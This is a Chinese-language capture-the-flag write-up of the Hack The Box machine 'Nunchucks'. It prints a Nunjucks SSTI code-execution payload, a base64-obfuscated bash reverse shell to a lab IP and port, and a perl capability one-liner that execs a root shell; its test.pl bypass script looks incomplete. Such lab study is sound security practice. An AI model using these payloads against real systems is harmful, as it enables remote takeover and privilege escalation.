HTB_Nunchucks

目录

一 渗透测试

(一)信息收集

1 端口扫描

2 组件框架

3 目录/子域名收集

(二)漏洞发现

1 SSTI

(二)CPA_perl提权

1 linpeas快速搜寻可疑提权点

2 perl提权

二 知识点

(一)SSTI

(二)CPA_perl提权

前言

模板可理解为一段固定好格式文件,只需用户填充信息。通过这种方法,可以做到逻辑与视图分离,更容易、清楚且相对安全地编写前后端不同的逻辑。模板基础形式:

{% ... %} 用来声明变量

{{ ... }} 用来将表达式打印到模板输出

{# ... #} 表示未包含在模板输出中的注释

在模板注入中,主要使用的是{{}} 和 {%%}

当前使用的一些框架,比如python的flask,php的tp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。

SSTI:如果用户输入作为【模板当中变量的值】,模板引擎一般会对用户输入进行编码转义,不容易造成XSS攻击。但是如果用户输入作为了【模板内容的一部分】,用户输入会原样输出。

漏洞成因就是服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性。

一 渗透测试

(一)信息收集

1 端口扫描

 发现22/80/443端口开放

2 组件框架

 使用Node.js环境,express服务,可考虑node.js反序列化漏洞,express框架登录绕过等漏洞

3 目录/子域名收集

访问80端口发现跳转到https://nunchucks.htb

 

添加到hosts文件

# echo '10.10.11.122 nunchucks.htb' >>/etc/hosts

子域名挖掘 

# gobuster vhost -w /usr/share/wordlists/dirb/common.txt -u https://nunchucks.htb/ -k

获取到子域store.nunchucks.htb添加到hosts文件

# echo '10.10.11.122 store.nunchucks.htb' >>/etc/hosts  

漏洞发现

1 SSTI

访问https://store.nunchucks.htb输入邮箱时会输出邮箱,可考虑XSS,并且网站一般不是.jsp/.php/.asp等脚本语言时,那么可能是go/python等其他开发语言架构时,可尝试服务器端模板注入SSTI。

 

1.1 SSTI测试

使用常规模板{{7*7}}测试

 返回信息可知当前存在SSTI漏洞。

1.2 确定模板引擎

站点使用node.js环境搜索nodejs templating engine(node模板引擎)。

 发现Nunjucks。

接着搜索Nunjucks templating engine

 拿到Payload:{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('id')\")()}}

 

1.3 SSTI反弹shell

#{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('echo YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4zLzk5OTkgMD4mMSIK| base64 -d |bash')\")()}}@qq.com"

 成功拿到user.txt

(二)CPA_perl提权

1 linpeas快速搜寻可疑提权点

 发现/bin/perl具备cap权限,也可以使用命令定位具备cap权限文件

#getcap -r / 2>dev/null

 

2 perl提权

2.1 CAP_perl常规提权失败

#perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

失败,猜测是perl被限制执行命令。

2.2 验证perl是否被限制部分命令

#perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "whoami";'

回显root,确认是被限制了使用部分命令

2.3  CAP_perl被限制绕过

思路:写一个perl运行环境的脚本test.pl

/*

#!/usr/bin/perl

use POSIX qw(strftime);

use POSIX qw(setuid);

POSIX::setuid(0);

*/

 成功拿到root权限

二 知识点

(一)SSTI

当前使用的一些框架,比如python的flask,php的tp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。

漏洞成因就是服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性。

(二)CPA_perl提权

Capability在linux中和suid相似,用来让普通用户具有超级用户权限工作,传统的linux分为超级用户和普通用户,后面增加了capability,用来赋予某个用户去执行高权限指令。

Capability可以分割root权限:

CPA_CHOWN:修改文件属性的权限

CPA_FSETID:允许设置位置文件setuid位

CPA_SETUID:允许改变进程的用户ID

CPA_SETGID:允许改变进程的组ID

CPA_perl,可使用#perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'提升到root权限。

但perl在被限制某些权限时,可考虑创建pl脚本执行/bin/bash成功拿到root权限。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值